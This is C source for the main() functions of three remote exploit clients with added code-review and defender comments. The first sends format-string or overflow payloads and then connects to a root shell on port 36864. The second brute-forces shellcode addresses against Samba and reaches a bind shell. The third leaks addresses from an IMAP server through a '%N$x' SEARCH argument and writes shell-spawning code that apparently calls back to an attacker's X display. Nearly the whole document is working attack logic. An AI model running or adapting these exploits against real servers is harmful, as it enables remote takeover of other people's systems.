/*
 * Entry point of a network exploit client.  Parses the command line,
 * lets make_fmt_code()/make_bof_code() (defined elsewhere) fill the
 * global buffer t_atk, sends that buffer to host:port, then connects a
 * second time to port 36864 and hands the socket to conn_shell().
 *
 * Only what is visible in this function is documented here; banrl(),
 * usage(), setsock(), re_connt(), conn_shell() and the platform[] table
 * live elsewhere in the file.
 *
 * Options (upper/lower case are equivalent):
 *   -d      set the global __debug_chk (adds a 10 s pause before send)
 *   -r ADDR override platform[type].dtors_addr (strtoul, base 0)
 *   -s ADDR override platform[type].shell      (strtoul, base 0)
 *   -f N    override platform[type].sflag      (atoi)
 *   -h HOST target host (copied into a 256-byte buffer)
 *   -t N    select a platform[] entry and reload retloc/shell/sflag
 *   -i      print usage
 *
 * Review notes:
 *  - The -t check only rejects type >= 4; a negative value from atoi()
 *    indexes platform[] out of bounds.  A lower bound (type < 0) is
 *    missing.
 *  - getopt() is compared against EOF rather than -1 (equal on common
 *    platforms, but -1 is what getopt() documents).
 *  - The option switch has no default: case; unknown letters are
 *    handled only through the '?' case.
 *  - strlen() returns size_t but is printed with %d; the (int) casts on
 *    make_*_code() calls discard the result instead of checking it.
 *  - send()/close() return values are not checked.
 *  - Defender note: the observable artefacts are one connection to
 *    host:port carrying t_atk, followed by a connection to port 36864.
 *  - main() falls off the end without a return statement (allowed for
 *    main in C99, but the exit status is then 0 regardless of outcome).
 */
int main(int argc,char *argv[]) {
    int sock,type=0;                  /* sock is also reused as the getopt() result */
    int port=(PORT);
    char host[256]=DEF_HOST;
    /* Defaults come from platform[0]; -t reloads all three from another entry. */
    int sflag=platform[type].sflag;
    unsigned long retloc=platform[type].dtors_addr;
    unsigned long shell=platform[type].shell;
    (void)banrl();                    /* banner; return value ignored */
    while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
        extern char *optarg;
        switch(sock) {
            case 'D': case 'd':
                __debug_chk=1;        /* global debug flag, read again before send() */
                break;
            case 'R': case 'r':
                retloc=strtoul(optarg,NULL,0);   /* no endptr/errno check */
                break;
            case 'S': case 's':
                shell=strtoul(optarg,NULL,0);    /* no endptr/errno check */
                break;
            case 'F': case 'f':
                sflag=atoi(optarg);
                break;
            case 'H': case 'h':
                /* Zero first so the strncpy() result is always NUL-terminated. */
                memset((char *)host,0,sizeof(host));
                strncpy(host,optarg,sizeof(host)-1);
                break;
            case 'T': case 't':
                type=atoi(optarg);
                /* NOTE(review): only the upper bound is checked; type < 0 is not rejected. */
                if(type>=4){
                    (void)usage(argv[0]);
                } else {
                    retloc=platform[type].dtors_addr;
                    shell=platform[type].shell;
                    sflag=platform[type].sflag;
                }
                break;
            case 'I': case 'i':
                (void)usage(argv[0]);
                break;
            case '?':
                fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
                exit(-1);
                break;
        }
    }
    fprintf(stdout," #\n # target host: %s:%d\n",host,port);
    fprintf(stdout," # type: %s\n",platform[type].os_type);
    /* Payload construction is done by these helpers into the global t_atk;
     * their return values are discarded.  No default: case, so an
     * unexpected type leaves t_atk untouched. */
    switch(type) {
        case 0: case 1:
            (int)make_fmt_code(retloc,shell,sflag);
            break;
        case 2:
            (int)make_bof_code(shell,sflag,0);
            break;
        case 3:
            (int)make_bof_code(shell,sflag,1);
    }
    /* NOTE(review): strlen() is size_t; %d is the wrong conversion (%zu). */
    fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
    sock=setsock(host,port);
    (void)re_connt(sock);
    if(__debug_chk) sleep(10);        /* -d: pause so the send can be observed */
    send(sock,t_atk,strlen(t_atk),0); /* return value unchecked */
    close(sock);
    fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
    sleep(1);
    /* Second connection, to a hard-coded port, is passed to conn_shell(). */
    sock=setsock(host,36864);
    (void)re_connt(sock);
    fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
    (void)conn_shell(sock);
}
/*
 * Entry point of a second exploit client (the messages refer to Samba).
 * Parses options, then either runs a single attempt or a "brute-force"
 * loop that re-sends the payload BRUTE_AT times with a different shell
 * address each time, checking after each attempt whether SH_PORT on the
 * target has become reachable.
 *
 * Helpers used but defined elsewhere: banrl(), usage(), setsock(),
 * re_connt(), __atk_code_send_recv(), send_recv_sh(), and the plat[]
 * table (fields .shell and .ost are read here).
 *
 * Options (upper/lower case are equivalent):
 *   -h HOST target host (copied into a 0x82-byte buffer, default "localhost")
 *   -s ADDR override plat[type].shell (strtoul, base 0)
 *   -t N    select plat[] entry 0 or 1 and reload shell
 *   -i      print usage
 *   -b      enable brute-force mode (flag is later reused as the loop counter)
 *
 * Review notes:
 *  - The -t check only rejects type > 1; a negative value from atoi()
 *    indexes plat[] out of bounds.
 *  - After a successful send_recv_sh() in the loop, control falls
 *    through to the "Brute-Force exploit failed" message and exit(-1);
 *    the success path has no break/exit of its own.
 *  - When the SH_PORT connect fails and the loop continues, the socket
 *    returned by setsock() is not closed (descriptor leak per iteration).
 *  - %p is used to print a u_long; the correct conversion is %lx.
 *  - The option switch has no default: case.
 *  - Defender note: a run of this tool shows up as repeated connections
 *    to ATK_PORT, each followed ~2 s later by a connect attempt to SH_PORT.
 *  - main() falls off the end without a return in the single-attempt path.
 */
int main(int argc,char *argv[]) {
    int sock,whtl,type=0,brute_f=0;
    char tg_host[0x82]="localhost";
    u_long shell=plat[type].shell;    /* default from plat[0]; -t or -s overrides */
    (void)banrl();
    if(argc<2) {
        (void)usage(argv[0]);
    }
    while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1) {
        extern char *optarg;
        switch(whtl) {
            case 'H': case 'h':
                /* Zero first so the strncpy() result is always NUL-terminated. */
                memset((char *)tg_host,0,sizeof(tg_host));
                strncpy(tg_host,optarg,sizeof(tg_host)-1);
                break;
            case 'S': case 's':
                shell=strtoul(optarg,0,0);       /* no endptr/errno check */
                break;
            case 'T': case 't':
                /* NOTE(review): only the upper bound is checked; type < 0 is not rejected. */
                if((type=atoi(optarg))>1) {
                    (void)usage(argv[0]);
                } else shell=plat[type].shell;
                break;
            case 'I': case 'i':
                (void)usage(argv[0]);
                break;
            case 'B': case 'b':
                brute_f++;
                break;
            case '?':
                fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
                exit(-1);
                break;
        }
    }
    if(brute_f) {
        fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
        fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
        fprintf(stdout," [*] Brute-Force mode:\n\n");
        fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
        fprintf(stdout,"\n |");
        /* brute_f is reused as the loop counter from here on. */
        for(brute_f=0;brute_f<BRUTE_AT;brute_f++) {
            fflush(stdout);
            fprintf(stdout,"=");              /* one progress tick per attempt */
            shell+=(0x100);                   /* next candidate address */
            sock=(int)setsock(tg_host,ATK_PORT);
            if((int)re_connt(sock,0)==-1) {
                /* Fill the remaining progress bar, then abort the whole run. */
                while(!(brute_f>=BRUTE_AT-1)) {
                    fprintf(stdout,"=");
                    brute_f++;
                }
                fprintf(stdout,"|\n\n");
                fprintf(stderr," [-] Connect Failed.\n\n");
                exit(-1);
            }
            __atk_code_send_recv(sock,shell);
            close(sock);
            sleep(2);
            /* Probe SH_PORT; reachability is taken as the success signal. */
            sock=(int)setsock(tg_host,SH_PORT);
            if((int)re_connt(sock,0)==-1) {
                continue;                     /* NOTE(review): sock is not closed here */
            }
            /* Fill the remaining progress bar so the loop ends after this pass. */
            while(!(brute_f>=BRUTE_AT-1)) {
                fprintf(stdout,"=");
                brute_f++;
            }
            fprintf(stdout,"|\n\n");
            /* NOTE(review): %p with a u_long argument; should be %lx. */
            fprintf(stdout," [+] Shellcode address: %p\n",shell);
            fprintf(stdout," [*] Brute-Force end !!\n\n");
            fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
            fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
            (void)send_recv_sh(sock);
            /* NOTE(review): no break/exit here, so after send_recv_sh() returns
             * the loop terminates and the "failed" block below still runs. */
        }
        fprintf(stdout,"|\n\n **\n");
        /* NOTE(review): this literal was wrapped across two lines in the listing
         * and is joined here; confirm against the original source. */
        fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
        fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
        fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
        fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
        exit(-1);
    } else {
        /* Single attempt: re_connt(sock,1) presumably aborts on failure itself
         * (second argument differs from the loop's 0) -- confirm in re_connt(). */
        fprintf(stdout," [0] Target: %s\n",plat[type].ost);
        fprintf(stdout," [1] Set socket.\n");
        sock=(int)setsock(tg_host,ATK_PORT);
        (int)re_connt(sock,1);
        fprintf(stdout," [2] Make shellcode & Send Packet.\n");
        __atk_code_send_recv(sock,shell);
        close(sock);
        fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
        sleep(2);
        sock=(int)setsock(tg_host,SH_PORT);
        (int)re_connt(sock,1);
        fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
        (void)send_recv_sh(sock);
    }
}
/*
 * Entry point of a third exploit client, this one speaking IMAP.  It
 * logs in with the supplied credentials, selects "inbox", sends a SEARCH
 * whose argument carries a positional printf directive and parses the
 * value echoed back between '|' markers into do_system_addr, then calls
 * send_exploit_code() once per word of xterm_shell[] and logs out.
 *
 * Helpers used but defined elsewhere: banrl(), usage(), get_10_ip(),
 * setsock(), re_connt(), send_exploit_code(), and the xterm_shell[] array.
 *
 * Options (upper/lower case are equivalent):
 *   -r ADDR retloc (default DTOR_END_ADDR)      -d ADDR do_system (default DO_SYSTEM)
 *   -h HOST target host                         -p N    port (default PORT)
 *   -f N    sflag (default DF_SFLAG)            -i IP   xhost_ip_buf, passed to get_10_ip()
 *   -u USER login name                          -s PASS login password
 *
 * Review notes:
 *  - user and pass are initialised to DEF_STR and then immediately zeroed,
 *    so the "!strcmp(user,DEF_STR)" / pass check below only detects an
 *    unset value if DEF_STR is the empty string -- confirm DEF_STR.
 *  - shaddr is assigned but never used in this function.
 *  - sscanf("%x") writes an unsigned int but the target is an unsigned
 *    long (undefined behaviour on LP64); %p is likewise used for unsigned
 *    long values where %lx is correct.
 *  - recv() returns -1 on error, which is truthy, so the two
 *    while(recv(...)) loops spin on a failed socket; buf is also not
 *    cleared between iterations, so strstr() may match stale bytes.
 *  - buf is not cleared before the final recv(), so the BYE/LOGOUT check
 *    can match data left over from the SEARCH reply.
 *  - The for loop compares int i with a size_t (sizeof/4); use size_t.
 *  - Credentials are taken from argv and are therefore visible in the
 *    process list; they are also left in memory without zeroisation.
 *  - Defender note: the on-the-wire sequence is LOGIN, SELECT "inbox",
 *    a SEARCH containing a "%N$x" directive, then LOGOUT; a SEARCH
 *    argument with printf-style directives is a useful detection signature.
 */
int main(int argc,char *argv[]){
    int sflag=DF_SFLAG;
    unsigned long do_system_addr=DO_SYSTEM;
    unsigned long retloc=DTOR_END_ADDR;
    unsigned long shaddr=SHELL;       /* NOTE(review): unused in this function */
    char host[256]=DEF_STR;
    int port=PORT;
    extern char *optarg;
    int sock,i,r=0;                   /* sock doubles as the getopt() result */
    char buf[1024];                   /* shared I/O buffer for every exchange below */
    char user[256]=DEF_STR;
    char pass[256]=DEF_STR;
    char *ptr=NULL;
    char xhost_ip_buf[256]=XHOST_IP;
    get_10_ip(xhost_ip_buf);          /* side effect on the global state -- see get_10_ip() */
    memset((char *)buf,0,sizeof(buf));
    /* NOTE(review): these two memsets discard the DEF_STR initialiser above. */
    memset((char *)user,0,sizeof(user));
    memset((char *)pass,0,sizeof(pass));
    (void)banrl();
    while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){
        switch(sock){
            case 'R': case 'r':
                retloc=strtoul(optarg,NULL,0);           /* no endptr/errno check */
                break;
            case 'D': case 'd':
                do_system_addr=strtoul(optarg,NULL,0);   /* no endptr/errno check */
                break;
            case 'H': case 'h':
                /* Zero first so the strncpy() result is always NUL-terminated. */
                memset((char *)host,0,sizeof(host));
                strncpy(host,optarg,sizeof(host)-1);
                break;
            case 'P': case 'p':
                port=atoi(optarg);
                break;
            case 'F': case 'f':
                sflag=atoi(optarg);
                break;
            case 'I': case 'i':
                memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf));
                strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1);
                get_10_ip(xhost_ip_buf);
                break;
            case 'U': case 'u':
                memset((char *)user,0,sizeof(user));
                strncpy(user,optarg,sizeof(user)-1);
                break;
            case 'S': case 's':
                memset((char *)pass,0,sizeof(pass));
                strncpy(pass,optarg,sizeof(pass)-1);
                break;
            case '?': default:
                (void)usage(argv[0]);
                break;
        }
    }
    /* Required-argument check; see the note above about user/pass and DEF_STR. */
    if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){
        (void)usage(argv[0]);
    }
    fprintf(stdout," [+] make socket.\n");
    fprintf(stdout," [+] host: %s.\n",host);
    fprintf(stdout," [+] port: %d.\n",port);
    sock=setsock(host,port);
    re_connt(sock);
    /* Banner: buf was zeroed and sizeof-1 is read, so it stays NUL-terminated. */
    recv(sock,buf,sizeof(buf)-1,0);
    if(strstr(buf,"IMAP4rev1")){
        fprintf(stdout," [+] OK, IMAP4rev1.\n");
    } else {
        fprintf(stdout," [-] Ooops, no match.\n\n");
        close(sock);
        exit(-1);
    }
    /* LOGIN; the reply is polled until " Completed" or " rejected" appears. */
    memset((char *)buf,0,sizeof(buf));
    snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass);
    send(sock,buf,strlen(buf),0);
    memset((char *)buf,0,sizeof(buf));
    /* NOTE(review): recv() == -1 is truthy, so an error keeps this loop spinning. */
    while(recv(sock,buf,sizeof(buf)-1,0)){
        if(strstr(buf," Completed")){
            fprintf(stdout," [+] login completed.\n");
            break;
        } else if(strstr(buf," rejected")){
            fprintf(stdout," [-] login failed.\n\n");
            exit(-1);                 /* socket is left open on this path */
        }
    }
    /* SELECT "inbox"; same polling pattern and the same recv() caveat. */
    memset((char *)buf,0,sizeof(buf));
    snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n");
    send(sock,buf,strlen(buf),0);
    memset((char *)buf,0,sizeof(buf));
    while(recv(sock,buf,sizeof(buf)-1,0)){
        if(strstr(buf," Completed")){
            fprintf(stdout," [+] select success.\n");
            break;
        } else if(strstr(buf," NO SELECT")){
            fprintf(stdout," [-] select failed.\n\n");
            exit(-1);
        }
    }
    /* get, do_system address */
    /* The SEARCH argument embeds "%<GET_DO_SYSTEM_SFLAG>$x" between '|'
     * markers ("%%" in the snprintf format yields a literal '%'); the
     * server's echo is parsed back with sscanf. */
    fprintf(stdout," [+] find do_system address.\n");
    memset((char *)buf,0,sizeof(buf));
    snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG);
    send(sock,buf,strlen(buf),0);
    memset((char *)buf,0,sizeof(buf));
    recv(sock,buf,sizeof(buf)-1,0);   /* return value unchecked */
    if(strstr(buf,"|")){
        ptr=(char *)strstr(buf,"|");
        /* NOTE(review): %x stores an unsigned int into an unsigned long (use %lx). */
        sscanf(ptr,"|%x|\n",&do_system_addr);
    }
    /* If the probe produced no value, the compile-time DO_SYSTEM default is adjusted instead. */
    do_system_addr-=DEF_DO_SYSTEM_OFFSET;
    fprintf(stdout," [+] make exploit code.\n");
    /* NOTE(review): %p with unsigned long arguments; should be %lx. */
    fprintf(stdout," [+] retloc address: %p.\n",retloc);
    fprintf(stdout," [+] do_system address: %p.\n",do_system_addr);
    fprintf(stdout," [+] send exploit code.\n");
    send_exploit_code(sock,retloc,do_system_addr,sflag);
    /* One call per 4-byte word of xterm_shell[], written at retloc+4, +6, +8, ...
     * NOTE(review): int i is compared against a size_t expression. */
    for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){
        send_exploit_code(sock,retloc+r,xterm_shell[i],sflag);
    }
#define LOGOUT_CMD "1 logout\n"
    send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0);
    sleep(1);
    /* NOTE(review): buf is not cleared here, so the BYE/LOGOUT test may
     * match bytes left over from the previous reply. */
    recv(sock,buf,sizeof(buf)-1,0);
    close(sock);
    if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){
        fprintf(stdout," [+] logout success.\n\n");
    } else {
        fprintf(stdout," [-] logout failed.\n\n");
        exit(-1);
    }
    exit(0);
}